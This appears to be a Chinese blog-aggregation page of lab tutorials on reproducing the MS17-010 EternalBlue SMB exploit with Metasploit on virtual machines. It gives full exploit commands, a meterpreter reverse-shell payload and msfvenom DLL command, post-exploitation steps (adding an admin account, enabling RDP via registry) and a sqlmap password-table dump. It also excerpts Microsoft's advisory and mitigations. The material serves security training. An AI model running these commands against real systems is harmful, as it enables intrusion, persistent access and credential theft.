-
2019-07-23 11:02:18
实验环境:
kali (虚拟机)
Windows 7 x64(虚拟机)1、查看两台机器的IP地址,且关闭win7防火墙
可见win7 IP为: 192.168.15.129
kali 为:192.168.15.1302、使用mdfconsole
在此之前需要进行端口扫描,需要确保win7的445端口开放,知道自己的没有关闭此端口,所以在这不进行端口确认了,像验证的可以利用nmap进行扫描,具体指令百度康康。启动 mdfconsole:
-msfconsole使用如下命令:
- use auxiliary/scanner/smb/smb_ms17_010
- show targets
- show options
第一句为利用auxiliary/scanner/smb/smb_ms17_010进漏洞分析,看看这个445端口是否能被入侵。
先使用show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认已经写好了大部分的参数,但还是需要手动设置一下RHOSTS的参数,即攻击的主机ip,这里我们写被攻击的win7的 ip。
设置RHOSTS 为win7的地址,之后执行run。看到结果绿色加号那行,主机可能存在MS17-010漏洞。确认可以通过MS17-010漏洞入侵。
使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue,
用show targets 查看该模块适用的主机系统
show options 查看选项。
只要设置RHOST为被攻击主机地址即可。
set RHOST xxx.xxx.xxx.xxx(被攻击主机地址)
执行run
当结束后,看到C:\Windows\system32> 即渗透成功,可以进行其余有趣的操作。更多相关内容 -
ms17漏洞利用
2022-02-14 11:33:16Ms17漏洞利用 首先了解msf的攻击技巧常用语 msfconsole 开启虚拟机msf search ms17 查询可利用的脚本 Run和exploit都是攻击命令 注意192.168.1.4是靶机 192.168.1.7是攻击机 show options 是查看版本payload...Ms17漏洞利用
首先了解msf的攻击技巧常用语
- msfconsole 开启虚拟机msf
- search ms17 查询可利用的脚本
- Run和exploit都是攻击命令
- 注意192.168.1.4是靶机 192.168.1.7是攻击机
- show options 是查看版本payload武器等
利用nmap扫描查看是否靶机开启445端口
若开启则利用au工具进行扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.4
set threads 100
run
开始攻击
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.4
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
run
成功
Net user 查看信息
Net user admin 1q! /add 创建新的用户
Net localgroup Administrators admin /add 赋予权限
Net getgui -e
打开一个新标签页面后 run rdesktop
打开靶机页面进行操作
Exit 推出
Mkdir创建目录mkdir tianqing
和mkdir tian
Upload上传文件upload 1
Download 下载文件 download (文件名)
Sqlmap 获取flag然后就是
被攻击机172.16.0.216
被攻击机windows servesr2008-r
攻击机192.168.140.134
将该bp代理所得以文件形式命名为test.txt保存在虚拟机桌面
接下来sqlmap -r test.txt
发现数据库版本5.6+
接下来进入数据库列表
sqlmap -r test.txt –dbs
发现有8个数据库
sqlmap -r test.txt --current-db //查看当前数据库所使用的数据库为csma
sqlmap -r test.txt -D cmsa –tables
对该数据库进行表的爆破
然后根据英文意思我们选择来进行爆破表manage
sqlmap -r test.txt -D cmsa -T manage --columns 对表的东西进行爆破
接下来对column中的name和password user爆破
sqlmap -r test.txt -D cmsa -T manage -C password,name,user –dump
获取密码然后用字典解析
-
MS17-010批量漏洞扫描工具
2018-07-18 16:13:32windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具 -
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
2020-10-05 06:01:41MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描 -
MS08067,MS10061漏洞靶机环境搭建.docx
2020-07-07 09:32:01MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下 -
MS17-010(永恒之蓝)漏洞分析与复现
2021-09-18 23:59:08文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块...文章目录
一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
二、漏洞复现
复现环境:
-
攻击机:Linux kali(IP:192.168.50.130)
-
靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)
实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!
复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机
nmap 192.168.50.0/24
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。2、使用MSF的永恒之蓝漏洞模块
打开MSF:msfconsole
MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢~( ̄▽ ̄)~
搜索 ms17-010 代码:search ms17_010
这里可以得到一些工具,其中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
3、使用ms17-010扫描模块,对靶机进行扫描:
使用模块:
use auxiliary/scanner/smb/smb_ms17_010
设置目标IP或网段:
set rhosts 192.168.50.132
执行扫描:run
如果出现以上情况,就说明存在漏洞。4、使用ms17-010攻击模块,对靶机进行攻击
使用模块:
use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP
set rhosts 192.168.50.132
可以使用 show options 命令查看设置选项
执行攻击:exploit 或 run
攻击完成!5、得到靶机shell
输入:chcp 65001 可解决乱码问题。
解决了,但是没有完全解决。6、通过shell对靶机进行控制
1、创建新用户 ,语法:net user 用户名 密码 /add
输入:
net user sss 123456 /add
查看用户信息,命令:net user
可以看到添加成功了。2、将用户sss添加至管理员组
net localgroup administrators sss /add
3、开启远程桌面功能查看3389端口状态:netstat -ano
看到3389端口并没有开启,开启3389端口,命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3389端口开启。4、远程桌面连接靶机
rdesktop 192.168.50.132:3389
使用创建的sss用户进行登录
登陆成功!
上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。 -
-
MS17-010永恒之蓝漏洞的简谈与利用
2021-11-12 17:58:15MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft ...MS17-010是一个安全类型的补丁。
MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。
于4月14号发出安全公告《Microsoft 安全公告 MS17-010 - 严重》
以下软件版本都受到影响。未列出的版本表明其支持生命周期已结束或不受影响。若要确定软件版本的支持生命周期,请参阅Microsoft 支持生命周期。
对每个受影响软件标记的严重等级假设漏洞可能造成的最大影响。若要了解在此安全公告发布 30 天内漏洞被利用的可能性(相对于严重等级和安全影响),请参阅3 月份公告摘要中的利用指数。
注意如需了解使用安全更新程序信息的新方法,请参阅安全更新程序指南。你可以自定义视图,创建受影响软件电子数据表,并通过 RESTful API 下载数据。如需了解更多信息,请参阅安全更新指南常见问题解答。重要提醒:“安全更新程序指南”将替代安全公告。
从 2016 年 10 月版开始,Microsoft 已更改 Windows 7、Windows Server 2008 R2、Windows 8.1、Windows Server 2012 和 Windows Server 2012 R2 的更新服务模式。有关详细信息,请参阅此Microsoft TechNet 文章。
此更新程序仅通过Windows 更新提供。
Windows 10 和 Windows Server 2016 更新为累积更新。除了非安全更新之外,每月安全发布还包括用于影响 Windows 10 的漏洞的所有安全修补程序。可以通过Microsoft 更新目录获取这些更新程序。请注意,从 2016 年 12 月 13 日起,Windows 10 和 Windows Server 2016 累积更新详情将在发行说明中归档。请参阅发行说明,了解操作系统内部版本号、已知问题和受影响文件列表信息。
*“替代的更新程序”列仅显示一系列被取代的更新程序中最新的更新程序。有关替代的更新程序的完整列表,请转到Microsoft 更新目录,搜索更新程序知识库文章编号,然后查看更新程序详细信息(替代的更新程序信息位于“程序包详细信息”选项卡中)。
多个 Windows SMB 远程执行代码漏洞
当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。
为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。
此安全更新通过更正 SMBv1 处理这些经特殊设计的请求的方式来修复漏洞。
下表包含指向“常见漏洞和披露”列表中每个漏洞标准入口的链接:
缓解因素
Microsoft 并未发现这些漏洞的任何缓解因素。
缓解因素
Microsoft 并未发现此漏洞的任何缓解因素。
变通办法
以下变通办法在您遇到的情形中可能会有所帮助:
禁用 SMBv1对于运行 Windows Vista 及更高版本的客户请参阅Microsoft 知识库文章 2696547适用于运行 Windows 8.1 或 Windows Server 2012 R2 及更高版本的客户的替代方法对于客户端操作系统:对于服务器操作系统:变通办法的影响。目标系统上将禁用 SMBv1 协议。如何撤消变通办法。回溯变通办法步骤,而不是将“SMB 1.0/CIFS 文件共享支持”功能还原为活动状态。
1、打开“服务器管理器”,单击“管理”菜单,然后选择“删除角色和功能”。
2、在“功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击“确定”以关闭此窗口。
3、重启系统。
4、打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。
5、在“Windows 功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击“确定”以关闭此窗口。
6、重启系统。
我们讲解了一下MS17-010,接下来我们来简谈一下永恒之蓝是什么
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
好了,我们刚刚也讲了这么多了,现在就拿靶机进行一次漏洞利用吧!
设置好windows7的ip地址与kalilinux的ip地址保持一致即可
我们还是先打开kalilinux的msf渗透测试框架进行搜索关于MS17-010的漏洞模块
我们开始搜索相关漏洞的利用模块
我们先使用auxiliary模块进行检测是否存在永恒之蓝漏洞
英语不是很好的师傅们可以进行翻译一下
检测结束,他告诉我们存在永恒之蓝漏洞,那么我们就可以来利用一下这个漏洞从而达成渗透系统的效果
然后我们设置一下ip地址
这里我强调一下,就是说这个永恒之蓝漏洞是只针对445端口的一个利用exp,如果我们不知道他的445端口是否打开的情况下,我们可以先使用nmap
或者其他端口扫描工具进行探测一下(注意保护好自己!!!)
我这里就不必掩护自己了,因为我是本地环境测试。
发现445端口开放状态,我们就可以进行下一步的测试环节了
设置好靶机ip地址后就可以开跑了
攻击失败,寻找原因.........
这个攻击失败的原因是因为windows7的防火墙是开启状态,我们将windows7的防火墙关闭掉再次进行测试
我们打开windows7靶机
额.........由于刚刚的攻击,给windows7直接打成蓝屏了,我们只好重启win7后进行测试了
开机后先查看ip地址是否有变化
修改ip地址后,关闭win7靶机的防火墙再次进行测试
我们继续进行测试
成功打入,我们看一下利用exp打入的用户权限是什么
打入成功,这次没有出现蓝屏。
如果你把防火墙的设置设置成下图这两种的话,那么也是无果的
这个针对的是开启防火墙并且处于公用网络状态下的测试结果
接下来我们换到家庭网络和工作网络的状态下进行测试
这是家庭网络状态下,我们可以成功打入win7系统
我们在切换到工作网络状态下进行测试
发现也是可以直接打入系统的
本次讲解到此结束,感谢各位师傅的观看。
-
永恒之蓝(ms17010)漏洞检测工具
2022-04-19 14:34:39在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以... -
永恒之蓝ms17_010方程式漏洞利用工具.rar
2019-12-03 14:32:17msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。... -
使用MS17-010漏洞对win7进行渗透(永恒之蓝)
2019-04-06 10:38:16使用MS17-010漏洞对win7进行渗透(永恒之蓝),ms17-010漏洞存在于未打补丁的win7&winserver2008; -
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
2017-07-27 10:56:14NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上) -
永恒之蓝检测工具MS17-010漏洞扫描工具
2017-06-28 16:34:34永恒之蓝检测工具MS17-010漏洞扫描工具 -
MS17-010 补丁
2017-05-15 11:17:48此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全... -
漏洞学习之:MS17-010
2021-11-15 22:37:50MS17-010 漏洞通过向主机的 SMBv1 服务发送恶意命令造成举出,最终导致任意命令执行。在 Windows 系统中 SMB 服务默认是开启的,监听端口默认为 445。影响的系统版本有 Windows NT–WinServer 2012。 利用前提:目标... -
ms17-010原理简介和复现
2017-09-01 12:58:30查阅了很多网络大牛对这个漏洞的分析和介绍,只对整体进行了一定的理解,具体的源码部分的漏洞原理还是一知半解。后面的复现部分也是我自己电脑上的三台虚拟机实现的。如果有错误希望大牛们能给我提出来,感谢。 -
MS10-070ASP.NETPaddingOracle信息泄露漏洞
2021-01-30 21:08:05我记得这个漏洞在12年的时候,国内的资料还很少,当时遇到之后来回找资料,但是国内当时在网上能看到的资料只有2篇,但我忘记是哪2篇了,不过手上是有2篇比较早的资料,先传上来做个引题吧。然后,在13年,这个漏洞... -
MS17010漏洞利用姿势
2021-10-14 13:45:25扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open MSF常规漏洞利用 msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 ... -
MS17-010漏洞分析与复现
2021-07-30 19:48:56MS17-010漏洞分析与复现1 前置知识2 漏洞简介3 漏洞代码简析4 复现5 可能遇到的问题5.1 在Meterpreter中开启vnc后无法控制目标计算机,只能监视。 1 前置知识 SMB(Server Message Block,服务器消息块): 一个... -
MS17010漏洞利用总结
2021-08-17 20:58:58扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open MSF常规漏洞利用: msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 ... -
MS17-010 永恒之蓝漏洞利用方式
2022-03-17 15:43:24Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux ... -
手把手教你如何复现MS17-010永恒之蓝漏洞
2021-08-17 10:02:49永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网... -
MS17-010复现步骤
2020-01-13 10:50:21MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 于4月14号发出安全公告《Microsoft ... -
ms17_010漏洞利用
2022-02-16 17:22:03MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将... -
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
2021-03-01 23:22:46作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry...所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。 -
ms17_010(永恒之蓝)漏洞利用
2020-11-19 11:22:37ms17_010(永恒之蓝)漏洞利用 1、MS17-010是什么 MS17-010漏洞利用模块就是利用Windows系统的Windows SMB远程执行代码漏洞, 向Microsoft服务器消息块(SMBv1)服务器发送经特殊设计的消息后,允许远程代码执行。 ... -
漏洞复现之MS17_010
2021-10-19 15:32:03MS17_010漏洞复现与利用 第一步:查找相应的模块,选择自己需要的模块 第二步:使用相应的模块 第三步:查找对应的payload 第四步:设置对应的payload 第五步:显示设置的选项,yes的必须填写,并设置远程的... -
Kali liunx MS17-010漏洞验证
2021-05-19 11:16:16MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。于2017... -
利用ms17-010漏洞提权
2019-03-27 00:59:23一、打开kali和win7查看IP。 (1) Windows7作为靶机 IP:192.168.43.109 (2) Kali作为攻击机(最新版kaili) IP:192.168.43.49 二、打开kali进入终端输入nmap ...四、进入后输人search ms17-010(搜素攻击模块) 五...